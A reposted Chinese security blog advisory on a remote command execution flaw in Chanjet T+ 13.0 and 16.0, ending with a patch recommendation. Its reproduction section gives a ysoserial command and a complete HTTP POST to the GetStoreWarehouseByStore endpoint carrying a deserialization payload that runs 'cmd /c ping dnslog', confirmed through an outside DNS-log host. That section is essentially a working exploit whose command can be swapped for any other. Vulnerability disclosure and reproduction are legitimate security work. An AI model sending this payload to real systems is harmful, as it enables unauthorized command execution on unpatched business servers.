畅捷通T+ 远程命令执行漏洞

admin

102755
文章

87
评论

2023年7月5日19:12:08评论492 views字数 1311阅读4分22秒阅读模式

漏洞简介

用友畅捷通Tplus组件存在远程代码执行漏洞，漏洞威胁等级：高危，能造成远程代码执行。

用友畅捷通Tplus存在前台远程代码执行漏洞，攻击者可利用GetStoreWarehouseByStore 方法注入序列化的payload，执行任意命令。最终造成服务器敏感性信息泄露或代码执行。

漏洞影响范围：

目前受影响的版本：

畅捷通Tplus 13.0

畅捷通Tplus 16.0

漏洞复现

使用ysoserial.exe生成payload

ysoserial.exe -g ObjectDataProvider -f JavaScriptSerializer -c "ping dnslog" -raw

畅捷通T+ 远程命令执行漏洞

使用yakit发送payload，响应"actorId或archivesId不能为空"说明利用成功

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveX-Ajaxpro-Method: GetStoreWarehouseByStoreContent-Type: text/plainContent-Length: 553
{ "storeID":{  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",  "MethodName":"Start",  "ObjectInstance":{   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",   "StartInfo":{    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",    "FileName":"cmd",    "Arguments":"/c ping dnslog"   }  } }}

畅捷通T+ 远程命令执行漏洞

查看dnslog，收到请求畅捷通T+ 远程命令执行漏洞

工具自动化利用

畅捷通T+ 远程命令执行漏洞

漏洞修复建议

当前官方已发布安全补丁，建议受影响的用户及时联系产商安装安全补丁。链接如下：

https://www.chanjetvip.com/product/goods/

原文始发于微信公众号（南街老友）：畅捷通T+ 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

畅捷通T+ 远程命令执行漏洞

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

发表评论

在线咨询

微信